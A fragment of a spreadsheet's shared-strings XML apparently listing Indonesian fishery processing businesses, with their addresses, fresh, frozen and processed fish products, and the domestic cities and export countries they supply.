    <t>RT 01 RW 11 Lingkungan Teleng, Kel. Sidoharjo, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Wonogiri, Kota Surakarta, Kota Yogyakarta, Kabupaten Pacitan, Kabupaten Ponorogo, Kabupaten Trenggalek, Kota Madiun, Kota Surabaya</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Tahu Bakso Ikan, Bakso Ikan)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surakarta, Kota Semarang, Kota Yogyakarta, Kabupaten Ponorogo, Kabupaten Trenggalek, Kabupaten Magetan, Kota Madiun, Kota Surabaya</t>
  </si>
  <si>
    <t>Dusun Bengkal RT 04 RW 04, Kel. Tanjungsari, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Yogyakarta, Kabupaten Pacitan, Kabupaten Ponorogo, Kota Surabaya</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Naget Tuna, Siomay Tuna, Kaki Naga Tuna, Tahu Tuna, Dimsum Tuna, Rolade Tuna, Sempol Tuna, Bakso Tuna) </t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Semarang, Kabupaten Pacitan, Kabupaten Ponorogo, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Muara Baru  Ujung Blok T No.12, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Salem, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal Hitam, Kakap Merah)</t>
  </si>
  <si>
    <t>Jl. Nusantara Laut RT 004 RW 005, Kel. Tanjungbalai Kota, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerisi, Jahan, Manyung, Kerapu, Kakap, Kaci-kaci)</t>
  </si>
  <si>
    <t>Kabupaten Karimun, Kota Batam</t>
  </si>
  <si>
    <t>Jl. Antena Baran Dua Meral RT 003 RW 004, Kel. Meral, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Bakso Ikan, Bakso Ikan Dengan Wortel</t>
  </si>
  <si>
    <t>Kabupaten Sambas, Kabupaten Ketapang, Kabupaten Sintang, Kota Pontianak, Kota Singkawang</t>
  </si>
  <si>
    <t>Ikan Olahan Lapis Kulit Tahu</t>
  </si>
  <si>
    <t>Kabupaten Ketapang, Kabupaten Sintang, Kota Pontianak, Kota Singkawang</t>
  </si>
  <si>
    <t>Kue Ikan</t>
  </si>
  <si>
    <t>Kabupaten Sambas, Kabupaten Ketapang, Kota Pontianak, Kota Singkawang</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Tuna, Tahu Tuna, Nugget Ikan, Siomay Ikan))</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Yogyakarta, Kabupaten Pacitan, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Hong Kong, India, Korea, Democratic People's Republic of, Kuwait, Malaysia, Saudi Arabia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, India, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Kuwait, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, India, Korea, Democratic People's Republic of, Kuwait, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok M No.1-2 (Room Nomor 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Kawabida, Salem, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal Hitam, Manyung, Kerapu, Layur, Bawal, Jenggot, Rejung, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>China, Philippines, Viet Nam</t>
  </si>
  <si>
    <t>Japan, Malaysia</t>
  </si>
  <si>
    <t>Teri Beku</t>
  </si>
  <si>
    <t>China, Hong Kong, Philippines, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Philippines, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Sirip Pari Kering, Kulit Pari Kering</t>
  </si>
  <si>
    <t>Jl. Veteran KM 02, Kel. Dirgahayu, Kec. Pulau Laut Utara, Kabupaten Kota Baru&lt;br&gt;Kalimantan Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi,, Kerapu, Kakap, Kuro)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Tenggiri)</t>
  </si>
  <si>
    <t>Pelabuhan Muara Baru Ujung Jl. Tuna 1 Blok K4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kota Tangerang</t>
  </si>
  <si>
    <t>China, Japan, Philippines, Thailand</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Deho, Lemadang, Marlin, Salem, Sarden)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Layur, Kakap Merah, Baronang)</t>
  </si>
  <si>
    <t>PPI GOTO, Kel. Tomalou, Kec. Tidore Selatan, Kota Tidore Kepulauan&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Kota Surabaya, Kota Bitung</t>
  </si>
  <si>
    <t>Jl. Muara Baru, Perum PPSJ Pelabuhan Nizam Zachman Blok J No.7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Philippines, Singapore, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Cakalang, Tenggiri, Todak)</t>
  </si>
  <si>
    <t>Korong Pasa Gelombang Nagari Kayu Tanam, Kel. Kayu Tanam, Kec. 2x11 Kayu Tanam, Kabupaten Padang Pariaman&lt;br&gt;Sumatera Barat</t>
  </si>
  <si>
    <t>Kabupaten Padang Pariaman, Kota Padang, Kota Pariaman</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Kaki Naga Ikan)</t>
  </si>
  <si>
    <t>Rendang Salai Lele</t>
  </si>
  <si>
    <t>Australia, China, United States</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Tangerang</t>
  </si>
  <si>
    <t>Dusun Morbeddih RT 002 RW 003, Kel. Panaguan, Kec. Larangan, Kabupaten Pamekasan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Mata Besar, Kerapu, Layur, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Kabupaten Pamekasan, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Marlin, Salem, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Gulama, Lencam, Kerapu, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok O Kav 1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Flounder, Kerapu, Layur, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Cirebon, Kabupaten Indramayu, Kabupaten Bekasi, Kabupaten Semarang, Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Mauritius, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Bonito, Cobia, Kembung, Gindara, Salem, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Cirebon, Kabupaten Indramayu, Kabupaten Bekasi, Kabupaten Semarang, Kota Surabaya, Kabupaten Tangerang, Kabupaten Serang</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Cirebon, Kabupaten Indramayu, Kabupaten Bekasi, Kabupaten Semarang, Kabupaten Tangerang, Kabupaten Serang</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Cirebon, Kabupaten Bekasi, Kabupaten Semarang, Kota Surabaya, Kabupaten Tangerang, Kabupaten Serang</t>
  </si>
  <si>
    <t>China, Japan, Mauritius, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Bakti No. 976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tenggiri, Parang-parang)</t>
  </si>
  <si>
    <t>Jl. Sinaboi Kecil Kuala, Kel. Sungai Bakau, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Sebelah)</t>
  </si>
  <si>
    <t>Jl. Raya Pengambengan, Kel. Tegalbadeng Barat, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Kota Medan, Kota Padangsidimpuan, Kota Bukittinggi, Kota Jambi, Kota Palembang, Kota Surabaya, Kota Banjarmasin, Kota Gorontalo</t>
  </si>
  <si>
    <t>Jl. Muara Baru Dermaga Timur Transit RT 20 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Philippines, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Gindara, Layang, Cakalang, Pedang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Kapten A Rivai No.63A, Kel. 26 Ilir, Kec. Bukit Kecil, Kota Palembang&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Kota Padang, Kota Palembang, Kota Jakarta Pusat, Kota Bandung</t>
  </si>
  <si>
    <t>Pergudangan Bizpark Blok B1 No.15, Jl. Gubernur Soebardjo Lingkar Selatan, Kel. Kayu Bawang, Kec. Gambut, Kabupaten Banjar&lt;br&gt;Kalimantan Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Malong,  Barramundi, Kerapu, Layur, Kakatua, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Barakuda, Kuwe, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Sebelah, Senangin, Manyung, Bawal)</t>
  </si>
  <si>
    <t>Pergudangan Bandara Mas Blok F No.12, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Nugget Ikan, Batagor Ikan, Cuankie Ikan, Cilok Ikan)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Bandung, Kabupaten Karawang, Kabupaten Bekasi, Kabupaten Bandung Barat, Kota Bandung, Kota Bekasi, Kota Depok</t>
  </si>
  <si>
    <t>Perum Taman Hang Tuah Blok A5 No.14 RT 001 RW 006, Kel. Baloi Permai, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Naget Ikan, Roll Ikan, Otak-otak Ikan, Cone Ikan) </t>
  </si>
  <si>
    <t>RT 01 RW 01, Kel. Penatarsewu, Kec. Tanggulangin, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Bandeng Asap</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Sidoarjo, Kota Surabaya</t>
  </si>
  <si>
    <t>Kerang Kupang Krispy</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Semarang, Kabupaten Sidoarjo, Kota Surabaya</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Rolade Ikan, Ekado, Otak-otak Bandeng) </t>
  </si>
  <si>
    <t>Dusun Karang Pakis RT 016 RW 005, Kel. Dukuhsari, Kec. Jabon, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Sosis Ikan, Siomay Ikan, Tahu Bakso Ikan)</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Cirebon, Kabupaten Sidoarjo, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Lencam, Kuwe, Angoli, Kerapu, Jenaha, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>RT 005 RW 001, Kel. Magersari, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Beloso, Kurisi)</t>
  </si>
  <si>
    <t>Jl. Krekot Bunder XI/11A, Kel. Pasar Baru, Kec. Sawah Besar, Kota Jakarta Pusat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>China, Japan, Korea, Republic of, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Pulau Pinang 2 Kawasan Industri Medan II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Singapore, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Cakung Cilincing Timur, Type Biz-C1 Hoek, Blok Green Sedayu 17, No. 001, Kel. Cakung Timur, Kec. Cakung, Kota Jakarta Timur&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Medan, Kota Pekanbaru, Kota Palembang, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Medan, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Makerel Atlantik, Makerel, Makerel Pasifik, Saba Mackerel)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Palembang, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Yogyakarta, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Palembang, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Medan, Kota Pekanbaru, Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Yogyakarta, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Palembang, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Raya Surabaya - Malang KM 40, Kel. Ngerong, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Pusat, Kota Bandung, Kota Semarang, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Denpasar, Kota Banjarmasin, Kota Balikpapan, Kota Samarinda, Kota Makassar</t>
  </si>
  <si>
    <t>Komplek Margomulyo Indah 27A No.1, Kel. Balongsari, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Sebelah, Manyung, Biji Nangka, Kerapu, Layur, Bawal, Kakap, Kuro, Lidah, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Bangkalan, Kota Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Pasuruan, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Korea, Republic of, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Kembung, Marlin, Selar, Layaran, Makerel, Layang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Gresik, Kabupaten Bangkalan, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Japan, Malaysia, Singapore, Thailand</t>
  </si>
  <si>
    <t>China, Hong Kong, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Desa Cenrana, Kec. Cenrana, Kabupaten Bone&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kota Bogor, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Juwana - Tayu RT 07 RW 03, Kel. Langgenharjo, Kec. Juwana, Kabupaten Pati&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Selar, Layang)</t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Jl. Jala IV No.32 Lk III, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Alu-alu, Julung-julung, Kembung, Salem, Aso-aso, Layang, Cakalang, Tenggiri, Selar Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Mata Besar, Malong, Lencam, Sebelah, Manyung, Biji Nangka, Kerapu, Layur, Jenaha, Beloso, Bawal, Kakap, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia, Viet Nam</t>
  </si>
  <si>
    <t>Kerang Asap Kaleng</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Katamba, Kerapu, Kakatua, Pinjalo, Kakap, Kurisi, Layur)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Emperor, Kerapu, Kakatua, Pinjalo, Kakap, Kurisi, Layur)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Julung-julung, Layaran, Sarden, Pedang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Julung-julung, Layaran, Sarden, Pedang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Deho, Layang)</t>
  </si>
  <si>
    <t>Jl. Tanjung Berombang Dusun V, Kel. Asahan Mati, Kec. Tanjungbalai, Kabupaten Asahan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl. Samuel Languyu No. 8A, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Australia, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore</t>
  </si>
  <si>
    <t>Jl. Udang RT 003 RW 005, Kel. Panipahan, Kec. Pasir Limau Kipas, Kabupaten Rokan Hilir&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Selar, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Swanggi, Malong, Sebelah, Senangin, Bawal, Samge, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Dusun Jarakan RT 23 RW 05, Kel. Karangsoko, Kec. Trenggalek, Kabupaten Trenggalek&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Jakarta Pusat, Kota Malang, Kota Mojokerto, Kota Surabaya, Kota Samarinda</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Jakarta Pusat, Kota Malang, Kota Mojokerto, Kota Samarinda</t>
  </si>
  <si>
    <t>Jl. Pelabuhan Perikanan Gabion Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Sarden, Aso-Aso, Salem, Layang Biru)</t>
  </si>
  <si>
    <t>Kabupaten Aceh Tenggara, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Pekanbaru, Kota Jambi, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok O Kav 3 &amp; 4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Japan, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Senangin, Kerapu)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Sebelah, Manyung, Kerapu, Layur, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Lemadang, Marlin, Meka, Gindara, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Lemadang, Marlin, Meka, Gindara, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Kamal Raya No. 15 RT 003 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. Kemayoran Atas 8 AQ 18-19 RT 03 RW 09, Kel. Cemorokandang, Kec. Kedungkandang, Kota Malang&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Tuna, Siomay, Tahu Tuna, Bandeng Isi, Galantine) </t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Semarang, Kota Malang, Kota Surabaya</t>
  </si>
  <si>
    <t>Dusun Krajan RT 02 RW 04, Desa Srigading, Kec. Lawang, Kabupaten Malang&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Medan, Kabupaten Bogor, Kabupaten Pasuruan, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar</t>
  </si>
  <si>
    <t>Azerbaijan, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Udang Blok M Kav No.7 Kawasan Pelabuhan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Udang Blok M Kav No.7 (Room 1), Kawasan Pelabuhan Perikanan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bekasi, Kota Depok, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bekasi, Kota Depok, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Salem, Deho)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bekasi, Kota Depok, Kota Tangerang</t>
  </si>
  <si>
    <t>Jl. KH. Wahid Hasyim Lorong Damai No.488 B, Kel. 7 Ulu, Kec. Seberang Ulu 1, Kota Palembang&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kota Semarang, Kota Yogyakarta, Kota Surabaya, Kota Tangerang</t>
  </si>
  <si>
    <t>Jl. Jamaker RT 05, Kel. Nunukan Timur, Kec. Nunukan, Kabupaten Nunukan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Layang)</t>
  </si>
  <si>
    <t>Kabupaten Berau, Kota Balikpapan, Kota Samarinda, Kabupaten Malinau, Kabupaten Bulungan, Kabupaten Tana Tidung, Kota Tarakan</t>
  </si>
  <si>
    <t>Jl. Sabutung Baru 3 No.25, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Katamba, Sebelah, Kerapu, Kaneke, Kakatua)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Barakuda, Lemadang, Layang, Tenggiri, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Dermaga Baru No.8 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Mata Goyang, Layur, Kerapu, Jenaha, Bawal, Pepetek, Kakap, Kuro)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Layang, Tenggiri, Cunang, Ekor Kuning)</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. A. Yani Km 47, Kel. Pulau Sari, Kec. Tambang Ulang, Kabupaten Tanah Laut&lt;br&gt;Kalimantan Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Semarang, Kota Surabaya</t>
  </si>
  <si>
    <t>Argentina, Australia, Brazil, China, Denmark, France, Germany, Hong Kong, India, Italy, Japan, Korea, Democratic People's Republic of, Malaysia, Netherlands, Oman, Panama, Portugal, Singapore, South Sudan, Taiwan, Province of China, Thailand, Turkey, United Arab Emirates, United Kingdom, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Makerel, Lemadang, Marlin, Gindara, Layaran, Layang, Cakalang, Pedang, Tenggiri)</t>
  </si>
  <si>
